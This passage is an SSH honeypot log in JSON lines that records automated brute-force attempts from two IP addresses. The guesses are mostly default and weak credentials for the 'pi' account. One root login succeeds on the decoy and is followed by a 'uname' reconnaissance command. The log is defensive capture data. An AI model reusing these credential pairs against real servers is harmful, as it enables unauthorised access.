{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:08.982480Z","src_ip":"212.227.125.160","session":"325c436e68be"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:09.050404Z","src_ip":"212.227.125.160","session":"325c436e68be"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345","message":"login attempt [pi/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:09.325633Z","src_ip":"212.227.125.160","session":"325c436e68be"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:09.749053Z","src_ip":"212.227.125.160","session":"e2a71c86e658"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":46314,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf18c9530b6c","protocol":"ssh","message":"New connection: 83.168.105.65:46314 (1.2.3.4:22) [session: cf18c9530b6c]","sensor":"my-vps","timestamp":"2025-08-26T11:34:09.789541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:09.790430Z","src_ip":"83.168.105.65","session":"cf18c9530b6c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:09.826055Z","src_ip":"83.168.105.65","session":"cf18c9530b6c"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:09.943355Z","src_ip":"83.168.105.65","session":"cf18c9530b6c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:10.442377Z","src_ip":"212.227.125.160","session":"325c436e68be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50150,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc15602e75a4","protocol":"ssh","message":"New connection: 212.227.125.160:50150 (1.2.3.4:22) [session: bc15602e75a4]","sensor":"my-vps","timestamp":"2025-08-26T11:34:10.495173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:10.559349Z","src_ip":"212.227.125.160","session":"bc15602e75a4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:10.560367Z","src_ip":"212.227.125.160","session":"bc15602e75a4"}
{"eventid":"cowrie.login.failed","username":"pi","password":"nimda","message":"login attempt [pi/nimda] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:10.938578Z","src_ip":"212.227.125.160","session":"bc15602e75a4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:10.980350Z","src_ip":"83.168.105.65","session":"cf18c9530b6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50314,"dst_ip":"1.2.3.4","dst_port":22,"session":"40755bf8ffe0","protocol":"ssh","message":"New connection: 212.227.125.160:50314 (1.2.3.4:22) [session: 40755bf8ffe0]","sensor":"my-vps","timestamp":"2025-08-26T11:34:12.069554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:12.125896Z","src_ip":"212.227.125.160","session":"40755bf8ffe0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:12.126721Z","src_ip":"212.227.125.160","session":"40755bf8ffe0"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:12.270001Z","src_ip":"212.227.125.160","session":"bc15602e75a4"}
{"eventid":"cowrie.login.failed","username":"pi","password":"11","message":"login attempt [pi/11] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:12.495241Z","src_ip":"212.227.125.160","session":"40755bf8ffe0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:13.798829Z","src_ip":"212.227.125.160","session":"40755bf8ffe0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35506,"dst_ip":"1.2.3.4","dst_port":22,"session":"44582507cc66","protocol":"ssh","message":"New connection: 212.227.125.160:35506 (1.2.3.4:22) [session: 44582507cc66]","sensor":"my-vps","timestamp":"2025-08-26T11:34:13.868242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:14.334795Z","src_ip":"212.227.125.160","session":"44582507cc66"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:14.335870Z","src_ip":"212.227.125.160","session":"44582507cc66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34732,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4d39dbd4197","protocol":"ssh","message":"New connection: 212.227.125.160:34732 (1.2.3.4:22) [session: e4d39dbd4197]","sensor":"my-vps","timestamp":"2025-08-26T11:34:14.459601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:14.472438Z","src_ip":"212.227.125.160","session":"e4d39dbd4197"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:34:14.516977Z","src_ip":"212.227.125.160","session":"e4d39dbd4197"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:34:15.339828Z","src_ip":"212.227.125.160","session":"e4d39dbd4197"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:34:15.468860Z","src_ip":"212.227.125.160","session":"e4d39dbd4197"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:34:15.469581Z","src_ip":"212.227.125.160","session":"e4d39dbd4197"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin1234","message":"login attempt [pi/admin1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:15.477453Z","src_ip":"212.227.125.160","session":"44582507cc66"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:15.521267Z","src_ip":"212.227.125.160","session":"e4d39dbd4197"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:15.522297Z","src_ip":"212.227.125.160","session":"e4d39dbd4197"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:16.522080Z","src_ip":"212.227.125.160","session":"44582507cc66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35518,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb373a4f6135","protocol":"ssh","message":"New connection: 212.227.125.160:35518 (1.2.3.4:22) [session: fb373a4f6135]","sensor":"my-vps","timestamp":"2025-08-26T11:34:16.563492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:16.564218Z","src_ip":"212.227.125.160","session":"fb373a4f6135"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:16.607613Z","src_ip":"212.227.125.160","session":"fb373a4f6135"}
{"eventid":"cowrie.login.failed","username":"pi","password":"andylau","message":"login attempt [pi/andylau] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:16.736734Z","src_ip":"212.227.125.160","session":"fb373a4f6135"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:17.781281Z","src_ip":"212.227.125.160","session":"fb373a4f6135"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35528,"dst_ip":"1.2.3.4","dst_port":22,"session":"afad01a82ee1","protocol":"ssh","message":"New connection: 212.227.125.160:35528 (1.2.3.4:22) [session: afad01a82ee1]","sensor":"my-vps","timestamp":"2025-08-26T11:34:17.822567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:17.823451Z","src_ip":"212.227.125.160","session":"afad01a82ee1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:17.866847Z","src_ip":"212.227.125.160","session":"afad01a82ee1"}
{"eventid":"cowrie.login.failed","username":"pi","password":"0123456","message":"login attempt [pi/0123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:17.994564Z","src_ip":"212.227.125.160","session":"afad01a82ee1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:19.077801Z","src_ip":"212.227.125.160","session":"afad01a82ee1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35534,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebfbf9fcf3a0","protocol":"ssh","message":"New connection: 212.227.125.160:35534 (1.2.3.4:22) [session: ebfbf9fcf3a0]","sensor":"my-vps","timestamp":"2025-08-26T11:34:19.142489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:19.177340Z","src_ip":"212.227.125.160","session":"ebfbf9fcf3a0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:34:19.214916Z","src_ip":"212.227.125.160","session":"ebfbf9fcf3a0"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1111","message":"login attempt [pi/1111] failed","sensor":"my-vps","timestamp":"2025-08-26T11:34:19.462644Z","src_ip":"212.227.125.160","session":"ebfbf9fcf3a0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:34:20.574383Z","src_ip":"212.227.125.160","session":"ebfbf9fcf3a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35500,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cb6e01e0df3","protocol":"ssh","message":"New connection: 212.227.125.160:35500 (1.2.3.4:22) [session: 8cb6e01e0df3]","sensor":"my-vps","timestamp":"2025-08-26T11:34:20.575591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:34:20.593792Z","src_ip":"212.227.125.160","session":"8cb6e01e0df3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 